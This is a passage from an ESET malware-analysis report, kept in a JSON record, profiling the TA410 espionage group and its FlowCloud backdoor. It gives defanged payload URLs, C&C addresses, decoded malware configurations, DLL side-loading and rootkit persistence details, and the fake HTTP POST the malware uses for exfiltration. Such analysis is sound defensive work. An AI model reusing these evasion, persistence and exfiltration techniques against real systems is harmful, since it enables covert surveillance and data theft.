{ "id": "4ad9d649-c142-4cce-9ea8-8500e34d101c", "created_at": "2026-04-06T00:16:48.247672Z", "updated_at": "2026-04-10T03:33:45.877761Z", "deleted_at": null, "sha1_hash": "87d35f03223812c5b64a7ffcc39fbbcef645e5b9", "title": "A lookback under the TA410 umbrella: Its cyberespionage TTPs and activity", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2785710, "plain_text": "A lookback under the TA410 umbrella: Its cyberespionage TTPs and\r\nactivity\r\nBy Alexandre Côté CyrMatthieu Faou\r\nArchived: 2026-04-05 13:21:51 UTC\r\nESET researchers have documented and analyzed TA410 activity going back to 2019. TA410 is a cyberespionage umbrella\r\ngroup loosely linked to APT10, known mostly for targeting US-based organizations in the utilities sector, and diplomatic\r\norganizations in the Middle East and Africa. TA410 has been active since at least 2018 and was first publicly revealed in\r\nAugust 2019 by Proofpoint in its LookBack blogpost. A year later, the then-new and very complex malware family called\r\nFlowCloud was also attributed to TA410.\r\nIn this blogpost, we provide a detailed profile of this APT group, including its modus operandi and toolset that includes a\r\nnew version of FlowCloud, discovered by ESET. This very complex backdoor contains interesting espionage capabilities.\r\nESET will present its latest findings about TA410, including results from ongoing research, during Botconf 2022. For YARA\r\nand Snort rules, consult ESET's GitHub account.\r\nKey points in this blogpost:\r\nTA410 is an umbrella group comprised of three teams ESET researchers named FlowingFrog, LookingFrog,Decrypt\r\nand inject   shellcode and JollyFrog, each with its own toolset and targets.\r\nESET telemetry shows victims all around the world, mainly in the governmental and education sectors.\r\nTA410 had access to the most recent known Microsoft Exchange remote code execution vulnerabilities, e.g.,\r\nProxyLogon in March 2021 and ProxyShell in August 2021.\r\nESET researchers found a new version of FlowCloud, a complex and modular C++ RAT. It has several interesting\r\ncapabilities, including:\r\nControlling connected microphones and triggering recording when sound levels above a specified threshold\r\nvolume are detected.\r\nMonitoring clipboard events to steal clipboard content.\r\nMonitoring file system events to collect new and modified files.\r\nControlling attached camera devices to take pictures of the compromised computer’s surroundings.\r\nFlowCloud deploys a rootkit to hide its activity on the compromised machine.\r\nThe LookBack backdoor utilized by TA410 uses a custom network protocol, which can function over HTTP or raw\r\nTCP, for C\u0026C server communications.\r\nTA410 is one of the users of the Royal Road malicious document builder.\r\nTA410 teams compromise their targets in various ways, which indicates to us that those victims are targeted specifically,\r\nwith the attackers choosing which entry method has the best chance of infiltrating the target.\r\nThe first stage of the FlowCloud version identified by ESET researchers can check whether specific security software is\r\ninstalled on the machine it tries to compromise, but this isn’t implemented in the loaders we analyzed. However, we found a\r\ncustom AntivirusCheck class, which can check running processes against a hardcoded list of executable filenames from\r\nknown security products, including ESET products. In case one of these products is detected, FlowCloud goes through its\r\nregular loading process and cancels the auto_start_after_install configuration value.\r\nEven though we believe that this version of FlowCloud is still undergoing development and testing, the cyberespionage\r\ncapabilities of this version include the ability to collect mouse movements, keyboard activity, and clipboard content along\r\nwith information about the current foreground window. This information can help attackers understand stolen data by\r\ncontextualizing it.\r\nFlowCloud can also gather information about things happening around the victim’s computer by taking pictures using\r\nconnected camera peripherals and recording audio using a computer’s microphone. This latter function is triggered by any\r\nsound over a threshold of 65 decibels, which is in the upper range of normal conversation volume.\r\nAttribution\r\nESET researchers believe that TA410 is composed of three different teams, using very similar tactics, techniques, and\r\nprocedures (TTPs) but different toolsets and exiting from IP addresses located in three different districts. These teams,\r\nreferred to below as FlowingFrog, LookingFrog, and JollyFrog, have overlaps in TTPs, victimology, and network\r\ninfrastructure.\r\nFlowingFrog uses Royal Road RTF documents, a first-stage implant called Tendyron, and a very complex second-stage backdoor called FlowCloud.\r\nLookingFrog uses a first-stage backdoor called X4, and LookBack as a second stage.\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 1 of 26\n\nJollyFrog uses only generic malware families such as Korplug (aka PlugX) and QuasarRAT. Part of the activity of\r\nthis team was described by Fortinet, who attributed the activity to APT10. ESET researchers, however, believe this\r\nactivity is different from the operations that APT10 (aka A41APT) has conducted recently.\r\nFlowingFrog and JollyFrog share network infrastructure – more precisely, the domain ffca.caibi379[.]com, as mentioned by\r\nProofpoint.\r\nFlowingFrog and LookingFrog ran a phishing campaign at the same time against the same targets, as also mentioned in the\r\nsame Proofpoint article.\r\nIn ESET telemetry, we do not see any other overlap between these subgroups. We believe that these subgroups operate\r\nsomewhat independently but that they may share intelligence requirements, an access team that runs their spearphishing\r\ncampaigns, and also the team that deploys network infrastructure.\r\nVictimology\r\nMost TA410 targets are high-profile organizations in the diplomacy and education sectors, but we have also seen victims in\r\nthe military sector, a manufacturing company in Japan, a mining company in India, and a charity in Israel. According to\r\nESET telemetry, the victims are located in Africa, Asia, the Middle East, and Europe. Interestingly, there is no clear\r\nsegmentation of the targeting (by sector or geography) among the different teams.\r\nAn element worth mentioning is that TA410 targets foreign individuals in China. In ESET telemetry, we have observed this\r\nas having happened at least twice: for instance, one victim is a French academic, and another is a member of a diplomatic\r\nmission of a South Asian country in China.\r\nSince 2018, we have seen the following targets, also depicted in Figure 1:\r\nFlowingFrog: University, foreign diplomatic mission of a South Asian country in China, mining company\r\nLookingFrog: Diplomatic missions, charity, government and industrial manufacturing\r\nJollyFrog: Education, church, military, diplomatic mission\r\nFigure 1. Map of countries and verticals targeted by TA410\r\nInitial compromise and typical TTPs\r\nIf we exclude the different backdoors, the three teams use a similar modus operandi. They compromise their targets either by\r\nspearphishing, according to Proofpoint, or, for LookingFrog and JollyFrog, by compromising a web-facing application such\r\nas Microsoft Exchange or SharePoint. This could indicate that victims are targeted specifically, with the attackers choosing\r\nwhich entry method is the best for a given target.\r\nThe public-facing application compromise approach is what we have seen the most. Attackers linked to LookingFrog\r\nexploited Microsoft SharePoint servers in 2019 to gain code execution, probably by leveraging CVE-2019-0604. They then\r\ndropped an ASPX webshell that was used to install other malicious components. These were either dropped directly via the\r\nwebshell or downloaded from a remote server using certutil.exe, a known LOLBin.\r\nIn 2020, we saw further exploitations by JollyFrog, of Microsoft SQL servers and IIS servers running custom applications.\r\nIn August 2021, we observed LookBack being loaded by an IIS worker process on a server belonging to an industrial\r\nmanufacturing company in Japan. This happened following the exploitation of the Exchange ProxyShell vulnerability on\r\nthat server, as we describe in ESET Threat Report T3 2021.\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 2 of 26\n\nThis shows that LookingFrog operators closely follow the discovery of RCE vulnerabilities in popular server applications\r\nand quickly make use of any available exploit in order to gain control of unpatched servers run by organizations on their\r\ntarget lists.\r\nIn addition to the full-featured backdoors analyzed in the following sections, these attackers use a variety of tools such as\r\nvulnerability scanners, exploits from the Equation Group leaks, proxy/tunneling utilities (HTran, LCX, EarthWorm), and\r\nlateral movement scripts such as WMIExec.\r\nArsenal\r\nTA410 – FlowingFrog\r\nFlowingFrog uses a first stage that ESET researchers have named the Tendyron downloader, and a complex second stage\r\nnamed FlowCloud, so named by the developers in its modules’ PDB paths.\r\nRoyal Road and Tendyron downloader\r\nRoyal Road is a malicious document builder used by several cyberespionage groups (see the analysis by nao_sec). Files\r\nbuilt with this tool are RTF documents exploiting Equation Editor N-day vulnerabilities such as CVE-2017-11882. TA410\r\noperators always use the Royal Road encoding bytes: A9 A4 6E FE, as seen in Figure 2.\r\nFigure 2. Encoded Royal Road payload\r\nOn October 13th 2020, we noticed that a new Royal Road RTF document, shown in Figure 3, had been uploaded to\r\nVirusTotal.\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 3 of 26\n\nFigure 3. Royal Road RTF document found on VirusTotal\r\n(SHA‑1: ADD5B4FD9AEA6A38B5A8941286BC9AA4FE23BD20)\r\nWhen opened, the document triggers the injection of a custom downloader – a PE executable – into an iexplore.exe process.\r\nThe PE resources 103, 104 and 105 contain the payload URLs, XORed with 0xD3. The following files are downloaded and\r\nwritten to disk:\r\nhttp://103.139.2[.]93:1702/tdr.dat written to %localappdata%\\Tendyron\\Tendyron.exe\r\n(SHA-1: 09C76522136B5E9BAB74381FEEE265F7E9B1D550)\r\nhttp://103.139.2[.]93:1702/okt.dat written to %localappdata%\\Tendyron\\OnKeyToken_KEB.dll\r\n(SHA‑1: F359D3C074135BBCA9A4C98A6B6544690EDAE93D)\r\nhttp://103.139.2[.]93:1702/md.dat written to %localappdata%\\Tendyron\\Tendyron.conf\r\n(we were not able to retrieve this file)\r\nFinally, this process separately downloads http://103.139.2[.]93:1702/t86.dat (resource 101), loads it into memory, and calls\r\nits startModule export. Unfortunately, we were not able to retrieve this sample.\r\nTendyron.exe is a legitimate executable, signed by online-banking security vendor Tendyron Corporation, and that is\r\nvulnerable to DLL search-order hijacking. Persistence for the downloaded payload is established via the Tendyron value\r\nunder the Run key HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run.\r\nWhen executed, Tendyron.exe loads the malicious OnKeyToken_KEB.dll. The export OnKeyT_ContextInit contains code\r\nthat decrypts hardcoded shellcode (see Figure 4) and injects it into iexplore.exe using WriteProcessMemory.\r\nFigure 4. Shellcode decryption loop\r\nThe next stage, injected into iexplore.exe, is a backdoor written using the Microsoft Foundation Class (MFC) framework. It\r\nalso contains RTTI symbols and thus a few C++ class names:\r\nClientSocket\r\nManager\r\nDllManager\r\nKernelManager\r\nThese class names are the same as used in Farfli/Gh0stRAT, a backdoor that has been used for more than 10 years to conduct\r\n(mostly) cyberespionage operations. Its source code was leaked and is now available on GitHub. Thus, we believe that\r\nTA410 developers reused code copied from Farfli.\r\nThe C\u0026C server is hardcoded, in cleartext, in the sample; in this specific case, it is set to 114.118.83[.]141.\r\nOn VirusTotal, as shown in Figure 5, we can see one more HTTP request to 103.139.2[.]93 was triggered during the\r\nexecution of the RTF file. The result of the request to http://103.139.2[.]93:1702/SL3716/S8437AEB.DAT was recorded by\r\nVirusTotal and the SHA-1 of this encrypted file is 140F81037A76B7B16A00E1D5E0E2CD9F6687F642. This URI is\r\ntypical of those used to download FlowCloud, a complex C++ implant described in the next section.\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 4 of 26\n\nFigure 5. URL requests seen by the VirusTotal sandbox during execution of the malicious RTF document\r\nThe identical encrypted file was also downloaded from http://114.55.109[.]199:56022/SL3716/S8437AEB.DAT by a\r\nFlowCloud dropper version 4.1.3 (SHA‑1: 014421BDB1EA105A6DF0C27FC114819FF3637704). A summary of the\r\ncompromise chain is provided in Figure 6.\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 5 of 26\n\nFigure 6. Compromise chain from the Royal Road document to FlowCloud\r\nFlowCloud\r\nFlowCloud is a complex implant written in C++. It consists of three main components, deployed in a multistage process that\r\nuses various obfuscation and encryption techniques to hinder analysis. Multiple versions of FlowCloud have been identified\r\nsince 2020, most notably versions 4.1.3 and 5.0.1 described by Proofpoint. In this section, we analyze FlowCloud versions\r\n5.0.2 and 5.0.3. Contrary to those previously found, the samples we obtained for version 5.0.2 contain verbose error\r\nmessages and meticulous logging.\r\nThis deployment process is very similar to the one described by Proofpoint for version 5.0.1. The three main components are\r\na driver with rootkit functionality, a simple persistence module, and a custom backdoor. We describe these in detail in the\r\nupcoming sections.\r\nLoader (ClientLdrExe)\r\nThe first stage is responsible mostly for creating the files and registry keys used by the other stages. The values for these\r\nexecutables and configuration data can be found, encrypted, in the loader’s resource section. Table 1 contains an overview of\r\nthese resources and their use.\r\nTable 1. Contents of the dropper’s resources\r\nResource ID Role Internal name\r\n100 FlowCloud RAT DLL fcClientDll \r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 6 of 26\n\nResource ID Role Internal name\r\n101 32-bit rootkit driver Driver\r\n102 64-bit rootkit driver Driver\r\n103 DLL hijacking vulnerable app N/A\r\n104 Shellcode loaded by the malicious library in the DLL hijacking SETLANG_dlcore\r\n105 Shellcode that loads fcClient (unused) N/A\r\n106 Final dropper stage fcClient\r\n107 32-bit persistence module fcClientWD_x86\r\n108 64-bit persistence module fcClientWD_x64\r\n109 Legitimate library used for module stomping slam\r\n110 DLL used for hijacking XXXModule_dlcore0\r\n1000 Protobuf serialized FlowCloud configuration N/A\r\n1001 Dropper configuration N/A\r\n2000 Used as an alternative or extension to resource 2001 N/A\r\n2001 Path to the registry key for the PrintProcessor service (used by the driver) N/A\r\n10000 Installation configuration N/A\r\nIn the instances we observed, most resources are written to disk encrypted, and only decrypted in memory when needed. In\r\nsome cases, they are then re-encrypted but with a different key. This technique makes it harder to dump the plaintext values\r\nfrom the process’s memory and to analyze exit dumps. The paths and registry keys to use, and whether they should be\r\ndecrypted before being written, are defined in the installation configuration. The samples we analyzed all store their files in\r\nthe %ProgramFiles%\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\ directory; we believe that this is the default value.\r\nFlowCloud uses filenames that are either similar to those of legitimate Windows files (e.g., rebare.dll which could be\r\nmistaken for rebar.dll) or innocuous looking (e.g., AC146142) to avoid suspicion.\r\nFigure 7 presents a graphical overview of the deployment process and its elements. We explain each of the steps in further\r\ndetail in the upcoming sections.\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 7 of 26\n\nFigure 7. FlowCloud deployment process\r\nFirst, the loader decrypts and parses the embedded installation configuration, which uses the Windows INI format. This\r\nconfiguration defines the malware’s install path along with the filename or registry key where each embedded resource is to\r\nbe written. The same values are hardcoded in the following stages, which leads us to think that the samples are generated\r\nusing a builder. In a sample we analyzed, this configuration is accompanied with comments explaining the values for some\r\nsections. Figure 8 shows this installation configuration with the comments translated into English.\r\n#Product name, these will be used in the configuration generator and applied to the front end\r\n[product]\r\nproduct_chs_name=Sky Arrow\r\nproduct_name=PCArrowI\r\nproduct_version=v5.0.2\r\n[general]\r\ncreated_folder=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\r\ninstall_folder=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\r\ndata_folder=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\fcdata\r\nhide_user_activity_tab = 0\r\n#File path, not including drive letter\r\n[file]\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 8 of 26\n\n100=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\responsor.dat\r\n103=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\setlang.exe\r\n104=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\setlangloc.dat\r\n#105=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\rebare.dat\r\n106=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\rescure.dat\r\n107=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\rescure86.dat\r\n108=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\rescure64.dat\r\n109=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\sspisrvui.dat\r\n110=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\setlangloc.dll\r\n101=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\E86F36C4\r\n102=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\AC146142\r\n1000=:\\Program Files\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\E19D9D4B\r\n#0x0001 Release without decryption\r\n#0x0002 Decryption release\r\n[file_out_type]\r\n100=0x0001\r\n103=0x0002\r\n104=0x0002\r\n#105=0x0002\r\n106=0x0002\r\n107=0x0002\r\n108=0x0002\r\n109=0x0002\r\n110=0x0002\r\n101=0x0001\r\n102=0x0001\r\n1000=0x0001\r\n##Registry path: separated by'|', respectively representing HKEY_LOCAL_MACHINE, path name, value name\r\n[key]\r\n##100=0x80000002|SYSTEM\\Setup\\PrintResponsor|1\r\n#101=0x80000002|SYSTEM\\Setup\\PrintResponsor|2\r\n#102=0x80000002|SYSTEM\\Setup\\PrintResponsor|3\r\n#1000=0x80000002|SYSTEM\\Setup\\PrintResponsor|4\r\n##2000=0x80000002|SYSTEM\\Setup\\AllowStart\\ceipCommon|1\r\n##2001=0x80000002|SYSTEM\\Setup\\AllowStart\\ceipCommon|2\r\n2001=0x80000002|SYSTEM\\Setup\\AllowStart\\ceipCommon|1\r\n##0x0001 Release without decryption\r\n##0x0002 Decryption release\r\n[key_out_type]\r\n##100=0x0001\r\n#101=0x0001\r\n#102=0x0001\r\n#1000=0x0001\r\n#2000=0x0002\r\n2001=0x0002\r\n#Service Information: hhw.exe needs to be dynamically generated\r\n[service_attribute]\r\nis_hhw=0\r\nservice_name=PrintResponsor\r\nservice_path=%ProgramFiles%\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\setlang.exe\r\nservice_parm=\r\nFigure 8. Installation configuration with explanatory comments. Note that some fields are commented out.\r\nThe configuration can also contain a section defining specific security software to check for, but this isn’t implemented in\r\nthe loaders we analyzed. However, there is a custom AntivirusCheck class, which can check running processes against a\r\nhardcoded list of XOR-encrypted executable filenames from known security products: 360 Total Security, Avast, Avira,\r\nAVG, Bitdefender, ESET, Jiangmin Technology Antivirus, Kingsoft, McAfee, Micropoint, Norton, Rising Antivirus, and\r\nTrend Micro. This class is only used if the loader is set to directly start the fcClient module via the auto_start_after_install\r\nconfiguration key.\r\nDepending on the configuration keys used, the loader can either load the fcClientDll RAT module directly, thus bypassing\r\nmost of the complex deployment process, or it can create a service or scheduled task. In the former case, the task or service\r\nattains persistence by being set to start automatically on boot. In the samples we observed, the task or service was\r\nconfigured to execute the next step of the installation process by running a legitimate application vulnerable to DLL search-https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 9 of 26\n\norder hijacking. The application and the accompanying relevant and malicious DLL were both embedded in the loader’s\r\nresources.\r\nDLL side-loading (XXXModule_dlcore0)\r\nIn the samples we analyzed, the vulnerable application was either setlang.exe from Microsoft Office 2003 with a malicious\r\nsetlangloc.dll or vpreview.exe from Visio Preview 2007 with a malicious vviewres.dll. Strings contained in the malicious\r\nDLL also point to emedres.dll from Emurasoft’s EmEditor as a possible third target for DLL side-loading. This is a real\r\npossibility as such vulnerabilities were present in older versions of EmEditor, but we did not see any samples using it.\r\nIn all observed samples, the malicious library is the same and serves to load and execute shellcode from a file that is stored\r\nunder the same name as the DLL, but with a .dat extension. We analyze this shellcode in the next section, but first, we want\r\nto look at the notable anti-analysis techniques used in this library.\r\nDespite its relatively simple goals, the library’s code makes heavy use of anti-debugging tricks and control flow obfuscation\r\nto hinder analysis. In the function that loads the next file, the useful code is repeatedly interspersed with the same sequence\r\nof opcodes to obfuscate the program’s flow. As shown in Figure 9, this short snippet is packed full of anti-analysis tricks, but\r\nultimately amounts to an unconditional 16-byte jump. This is enough to foil many automatic analyses, including\r\ndecompilers.\r\nFigure 9. Annotated disassembly of the control flow obfuscation snippet\r\nThe above snippet is bookended by calls to two anti-debugging functions, as can be seen in Figure 10. The function, which\r\nwe named crash_if_debugger in the previous screenshot, calls IsDebuggerPresent and checks some commonly hooked\r\nlibrary functions for a breakpoint as their first instruction. If those checks detect a debugger, the function returns a value that\r\nwill cause the program to jump to an invalid address and crash. The second one raises an exception via the INT 0x2D\r\ninstruction and exits if it was handled by a debugger.\r\nFigure 10. Decompiler view showing the obvious pattern of anti-debugging checks. Note that we had to remove the\r\naforementioned obfuscation for the decompiler to produce any output.\r\nfcClient (rescure.dat)\r\nWhen it is first executed, this module sets up persistence and installs the backdoor, rootkit, and persistence modules. It then\r\nsets specific registry keys and files as guardrails to skip the setup on subsequent runs.\r\nFirst, persistence is established by using the ITaskService COM interface to create the\r\n\\Microsoft\\Windows\\CertificateServicesClient\\NetTask scheduled task. If a task with the same name already exists, it is\r\ndeleted before the new one is created. This task will run the DLL hijacking target as SYSTEM at each boot.\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 10 of 26\n\nAfterwards, the rootkit module is decrypted and written to the %System%\\drivers folder as hidmouse.sys. A hidmouse\r\nservice is then created to run that module and is immediately started. The file is then deleted from the disk and replaced by a\r\ncopy of the legitimate hidusb.sys driver from the same folder. Thus, anyone looking at the file on disk rather than the one\r\nmapped into memory would see a legitimate, benign file.\r\nOn Windows 10 machines, the system time is briefly changed to make it look like the service was created in January 2013.\r\nBoth this and the use of the legitimate driver directory help the rootkit blend in with other drivers.\r\nThe following files are copied to the %System% directory:\r\nThe backdoor: rescure.dat\r\nA decoy DLL: sspisrvui.dat as sspisrvui.dll (timestomped to July 2013)\r\nThe encrypted shellcode: rebare.dat\r\nThe rebare.dat shellcode is very similar to that used in the self-decrypting DLL, but it loads fcClient directly.\r\nFlowCloud then starts a suspended process to perform injection on it. This process is created via CreateProcessAsUserW\r\nusing a token retrieved from the explorer.exe or winlogon.exe process in the current session.\r\nThe injected code loads the same backdoor (rescure.dat) into the process’s memory and calls its startModule export to finish\r\nthe installation. Meanwhile, the injection process is terminated.\r\nAt this point, installation of the backdoor is complete. All that is left is to execute the backdoor. To achieve this, the new\r\nprocess loads the decoy DLL and manually replaces its content in memory with the fcClientDll module (a process known as\r\nmodule stomping or DLL hollowing), before calling its main function.\r\nfcClientDll (responsor.dat)\r\nThis complex module is the main component of the backdoor. It provides a wide range of capabilities from full file system\r\naccess to control of camera peripherals and everything in between. Although we did not observe any plugins, the backdoor\r\ncontains code that hints that they can be used to further extend functionality.\r\nBefore diving deeper into the functionalities, we want to highlight some notable characteristics:\r\nConfiguration information and data for communications with the C\u0026C server are Protobuf-serialized, compressed,\r\nand encrypted.\r\nFile exfiltration is done through encrypted, Protobuf-serialized structures and is disguised as HTTP by prepending the\r\ndata with a hardcoded, fake POST request. The Content-Length header is the only variable element, as it is set to the\r\nactual size of the data sent. This hardcoded request can be seen in Figure 11.\r\nMultiple functionalities are implemented through the use of COM objects and interfaces.\r\nPOST /messagebroker/amf HTTP/1.1\r\nHost: s.peheavens.com\r\nConnection: keep-alive\r\nContent-Length: \u003ccontent_length\u003e\r\nOrigin: http://s.peheavens.com\r\nX-Requested-With: ShockwaveFlash/20.0.0.306\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36\r\nContent-Type: application/x-amf\r\nAccept: */*\r\nReferer: http://s.peheavens.com/html/portlet/ext/draco/resources/draco_manager.swf/[[DYNAMIC]]/1\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: zh-CN,zh;q=0.8\r\nCookie: COOKIE_SUPPORT=true; JSESSIONID=5C7E7A60D01D2891F40648DAB6CB3DF4.jvm1; COMPANY_ID=10301; ID=666e737554567869564567\r\nFigure 11. Hardcoded, fake HTTP POST request used for FlowCloud C\u0026C communication\r\nThis component uses an encrypted, Protobuf-serialized configuration that it tries to read from a file on disk or a registry key.\r\nThe configurations we observed were composed of three sections:\r\n1. server_config: This section contains information about the C\u0026C servers and identification information about the\r\nvictim and backdoor.\r\n2. policys [sic]: This section defines the behavior of the backdoor’s components and is described in detail in the\r\nfollowing paragraphs.\r\n3. install_config: As the name indicates, this section defines the installation parameters.\r\nAn example of such a server_config is shown in Figure 12. This configuration corresponds to resource 1000 in the initial\r\nloader. It defines the address and port for both the exfiltration server (file_server) and the C\u0026C server (exchange_server),\r\nalong with the encryption key to use for communication with each. A fallback server can also be defined for each of these.\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 11 of 26\n\nThe file_key field defines the encryption key to use when storing files that are to be exfiltrated. The other entries are used to\r\nidentify the backdoor and the victimized host:\r\nproduct_name: A name for the backdoor in use. PCArrowI seems to correspond to FlowCloud.\r\nproduct_version: The backdoor’s version.\r\nid_prefix: This value is prefixed to the generated ID. Presumably, used to group victims or campaigns.\r\nid: This value uniquely identifies the victim. Initially, it is empty; the value is generated on the first execution using\r\nthe following format: \u003cprefix\u003e_\u003ccurrent timestamp\u003e_\u003cmachine hostname\u003e\r\nserver_config\r\n{\r\n \r\n product_name: “PCArrowI\"\r\n product_version: \"v5.0.2\"\r\n id: \"1202_[REDACTED]\"\r\n root: \"\"\r\n file_server: \"47.111.22[.]65\"\r\n file_server_port: \"80\"\r\n file_server_bak: \"\"\r\n file_server_bak_port: \"\"\r\n exchange_server: \"47.111.22[.]65\"\r\n exchange_server_port: \"81\"\r\n exchange_server_bak: \"\"\r\n exchange_server_bak_port: \"\"\r\n file_server_key: \"E\\367\\016\\031\u003c…\u003e\"\r\n xchg_server_key: \"8\\335\\325$\u003c…\u003e\"\r\n file_key: \"U\\267\\323\\353\\\u003c…\u003e\"\r\n is_audio_only: false\r\n id_prefix: \"1202\"\r\n}\r\nFigure 12. server_config section of a decoded FlowCloud configuration\r\nFlowCloud’s capabilities are spread out over a series of singleton classes, each of which implements a cohesive set of\r\nfunctionalities related to a specific type of data or action. These roughly follow an internal naming convention where classes\r\nwith names ending with manager_handler perform actions in response to C\u0026C commands, while those whose names end\r\nwith manager automatically perform actions based on timers or event listeners.\r\nEach manager stores collected data in its own SQLite database, while data that is collected on demand is returned directly to\r\nthe C\u0026C server. Data is encrypted with the aforementioned file_key before being inserted into the database. The location of\r\nthe SQLite databases is defined by the data_folder install configuration key, with the default value being\r\n%ProgramFiles%\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\fcdata.\r\nThe classes are orchestrated by an instance of fc_kernel_manager. This object is responsible for initializing other\r\ncomponents and handling C\u0026C connections. It can also update the local configuration when the corresponding command is\r\nreceived.\r\nAs shown in Figure 13, parameters and frequency of automated actions can be specified and finely tuned through\r\nconfiguration policies. Data exfiltration is likewise automated: policies can contain a cache_size or cache_count parameter,\r\nwhich determines how much data can be collected locally by the corresponding class before it is staged for exfiltration.\r\npolicys {\r\n keyboard_policy {\r\n state: true\r\n cycle_time: 60\r\n limit_size: 100\r\n cache_size: 10\r\n }\r\n screen_policy {\r\n state: true\r\n cycle_time: 30\r\n cache_count: 200\r\n bit_depth: 4\r\n }\r\n audio_policy {\r\n state: false\r\n cache_size: 100\r\n decibel_limit: 65\r\n continue_seconds: 15\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 12 of 26\n\n}\r\n smfile_search_policy {\r\n guid: \"XXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\"\r\n state: false\r\n research: true\r\n inc_all_removable: true\r\n inc_all_fixed: true\r\n limit_size: 1\r\n recent_days: 30\r\n filter: \"*.doc\"\r\n filter: \"*.docx\"\r\n filter: \"*.xls\"\r\n filter: \"*.xlsx\"\r\n filter: \"*.ppt\"\r\n filter: \"*.pptx\"\r\n filter: \"*.bmp\"\r\n filter: \"*.jpg\"\r\n filter: \"*.png\"\r\n filter: \"*.gif\"\r\n cache_size: 1024\r\n b_exclude_system_files: true\r\n b_exclude_system_folders: true\r\n }\r\n installedapp_policy {\r\n state: false\r\n }\r\n clipboard_policy {\r\n state: false\r\n ignore_repeat: true\r\n cycle_time: 300\r\n limit_size: 100\r\n single_limit_size: 10\r\n cache_size: 50\r\n }\r\n user_activity_policy {\r\n process_activity_state: false\r\n browser_activity_state: false\r\n }\r\n}\r\nFigure 13. The policys [sic] section of a decoded FlowCloud config\r\nAs we have previously mentioned, this implant uses a lot of classes. Rather than documenting each of them individually, we\r\nwill present an overview of the available functionality by grouping them into three categories: those that interact with the\r\nfile system, functionalities that collect information about programs and processes, and those that gather real-time\r\ninformation about user activity.\r\nFile system\r\nFlowCloud provides interaction with the file system in a variety of ways, most of which can store file metadata and content\r\nin their SQLite database.\r\nOne of these is a component that walks through all mapped file systems and collects files that are not excluded by filters in\r\nthe smfile_search_policy. It also creates an invisible window that listens for file creation, modification, or renaming events.\r\nThe corresponding files are collected unless they are excluded by that policy.\r\nAnother component collects information about mapped volumes, including mount point, name, drive type, and disk usage\r\ndata. This same class collects file and directory metadata.\r\nAs a complement to these automated measures, the backdoor implements functions that provide full access and control over\r\nthe content of mounted drives. This includes bidirectional file transfers between the C\u0026C and the compromised machine.\r\nPrograms and processes\r\nFlowCloud is able to automatically obtain a list of installed software through the use of the undocumented\r\nIShellAppManager COM interface. This functionality can also be invoked via a C\u0026C command. Figure 14 shows, after the\r\nextraneous code has been removed, how that interface is used.\r\nhttps://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/\r\nPage 13 of 26\n\nFigure 14. Simplified code showing how the IShellAppManager COM interface is used to list installed applications\r\nOther commands can be used to retrieve a detailed list of available services and currently running processes.\r\nAnother interesting feature is the near real-time monitoring of process activity. To achieve this, FlowCloud runs WMI\r\nqueries every second to get all process creation and termination events. The obtained information is correlated with data\r\nfrom the Win32_Process table for a more detailed view.\r\nUser activity\r\nFlowCloud is able collect a miscellany of data that we have decided to group under the “User activity” umbrella.\r\nIt has the ability to monitor the clipboard for changes and save any data it contains. As seen in Figure 15, it achieves this by\r\ncreating an invisible window with a custom class and registering two clipboard formats. This window uses\r\nAddClipboardFormatListener (on Windows Vista or more recent) or SetClipboardViewer (on Windows XP and prior) to\r\nlisten for clipboard content changes.\r\nFigure 15. Set up monitoring of the clipboard\r\nCollected clipboard content is stored along with information about the current foreground window. This information can\r\nhelp attackers understand the data by contextualizing it.\r\nFlowCloud can periodically take screenshots and store them with information about the foreground process and time 